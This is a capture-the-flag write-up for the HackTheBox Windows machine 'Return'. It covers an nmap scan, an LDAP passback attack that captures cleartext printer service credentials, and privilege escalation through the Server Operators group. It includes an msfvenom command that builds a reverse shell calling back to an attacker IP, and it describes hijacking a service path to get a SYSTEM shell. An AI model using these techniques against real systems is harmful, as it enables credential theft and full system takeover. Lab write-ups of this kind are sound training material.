HTB - Return Writeup

👾 Machine Overview

This is a writeup of the machine Return from HTB, it’s an easy difficulty Windows machine which featured an LDAP passback attack, and local privilege escalation via the Server Operators group.

🔍 Enumeration

An initial nmap scan of the host gave the following results:

nmap -sV -sC 10.129.95.241
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-29 14:08 EDT
Nmap scan report for 10.129.95.241
Host is up (0.019s latency).
Not shown: 990 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
53/tcp  open  domain        Simple DNS Plus
80/tcp  open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: HTB Printer Admin Panel
88/tcp  open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-29 18:27:14Z)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds?
464/tcp open  kpasswd5?
593/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp open  tcpwrapped
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-29T18:27:16
|_  start_date: N/A
|_clock-skew: 18m34s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.70 seconds

Anonymous SMB and LDAP didn’t provide any quick wins.

🌐 HTB Printer Admin Panel

The site running on port 80 has an admin panel for a printer that’s accessible without any authentication

Printer Admin Panel

The settings page lists information for an LDAP server that we’re able to change. I checked the page source to see if we could read the password on the site, but it’s actually correctly censored to stars.

Printer Settings

I spun up a netcat listener on port 389, and changed the LDAP server address to my box’s ip to see if we could perform an LDAP passback.

Modified Printer Settings

Sure enough, it’s authenticating using a cleartext password for svc-printer.

Netcat Output

I used the credentials to log in and grab the flag.

Shell as svc-printer

🥇 Root

I started by checking out svc-printer‘s groups and privileges.

Privileges

Groups

We have some pretty notable groups and privileges, specifically the Server Operators group, SeLoadDriverPrivilege, and SeBackupPrivilege.

I started off by trying to exploit SeBackupPrivilege to dump the SAM and SYSTEM files, but that only resulted in hashes for local accounts that I wasn’t able to crack or pass to login.

I then tried using SeLoadDriverPrivilege and this POC to load a malicious driver, but that didn’t work either.

💻 Server Operators

Members of the Server Operators group are able to manipulate services, we can use either sc.exe or PsService.exe to create a service that will start a given executable as NT AUTHORITY\SYSTEM.

I first used msfvenom to create a reverse shell in exe format.

1	msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=6969 -f exe -o rev.exe

I then used sc.exe to change the path of the VSS service to the reverse shell, and started it.

Editing the VSS service

This popped a system level shell which I was then able to use to grab the flag.

Shell as SYSTEM

📖 Resources

🔗 Hyperlink	ℹ️ Info
SeBackupPrivilege	Cybersec Notes
SeLoadDriverPrivilege	POC for loading a malicious driver
Server Operators	HackTricks Server Operators PrivEsc